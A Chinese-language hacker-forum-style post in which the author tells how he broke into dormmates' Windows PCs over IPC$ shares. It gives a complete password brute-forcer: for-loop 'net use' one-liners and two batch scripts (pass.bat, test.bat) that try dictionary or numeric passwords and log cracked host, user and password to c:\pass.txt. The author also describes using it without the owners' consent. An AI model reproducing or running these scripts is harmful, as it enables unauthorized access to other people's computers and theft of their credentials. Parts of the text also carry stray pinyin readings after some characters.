假如知道一個NT帳戶與密碼，就可以用

net use \\主機(jī)\ipc$ "密碼" /user:"用戶"

與遠(yuǎn)程主機(jī)建立連接，這是每一個黑客或是夢想成為又或是正在努力成為黑客的朋友都知道的方法，甚至連我這個連菜鳥都算不上的小鳥都知道，我也僅僅知道這一條，我就用我僅僅知道的這一條在宿舍網(wǎng)里進(jìn)入別人的電腦，因為他們的電腦密碼都為空，被他們發(fā)現(xiàn)了之后狠K了一頓，然后紛紛加上了密碼，這下可沒戲了，想去偷窺他們的密碼他們又防范得緊，只得想其他辦法，也許各位大蝦們就會利用其他方法，諸如尋找系統(tǒng)之類得到管理權(quán)限，而我不行，因為我前面說過，我只會那一條，那又會有人說用軟件暴力破解密碼就可以了，也許不錯，但首先我沒有那些高深的軟件也沒有天賦去研究那些復(fù)雜的用法，卻在無意間看DOS幫助時發(fā)現(xiàn)了一些命令，當(dāng)真是天無絕人之路：

1、字典：for /f %i in (字典文件) do net use \\主機(jī)\ipc$ "%i" /user:"用戶" 2、數(shù)字：for /l %i in (start,step,end) do net use \\主機(jī)\ipc$ "%i" /user:"用戶"

以上可參看DOS里面for幫助，還別說，真讓我給連上幾臺機(jī)子，可問題也隨之而來，連是連上了，我仍然不知道密碼，下次要用還得重新全部試過。
正失望，無意間又發(fā)現(xiàn)了一個好方法，也許是我太笨，也許你們更聰明，說不定你們早已經(jīng)發(fā)現(xiàn)了，不再說廢話，下面就將方法全部給出，請各位大蝦指正：
將下面文件存為pass.bat:

@echo off echo ---------------------------------------- >>c:\pass.txt echo ---------------------------------------- >>c:\pass.txt date /t >>c:\pass.txt time /t >>c:\pass.txt echo 破解結(jié)果： >>c:\pass.txt if "%6"=="1" goto shit2 :shit1 start "正在破解" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3 goto quit :shit2 start "正在破解" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5 :quit 將下面文件存為test.bat: net use \\%1\ipc$ %2 /user:"%3" goto answer%ERRORLEVEL% rem %ERRORLEVEL%表示取前一命令執(zhí)行返回結(jié)果，net use成功返回0，失敗返回2 :answer0 echo 遠(yuǎn)程主機(jī)："%1" >>c:\pass.txt echo 用 戶："%3" >>c:\pass.txt echo 密 碼：%2 >>c:\pass.txt net use \\%1\ipc$ /delet exit :answer2

將pass.bat與test.bat存放于system32中，用法如下：
1、如果用字典破解：pass.bat 字典文件路徑及名稱 主機(jī) 用戶名
2、如果用數(shù)字破解：pass.bat 起始數(shù) 步長 結(jié)束數(shù) 主機(jī) 用戶名 1
密碼破解出來之后，存放于c:\pass.txt文件里面。
另外，我做的這些只是在局域網(wǎng)內(nèi)測試，如果遠(yuǎn)程測試，受網(wǎng)速限制，具體情況只能靠自己去摸索。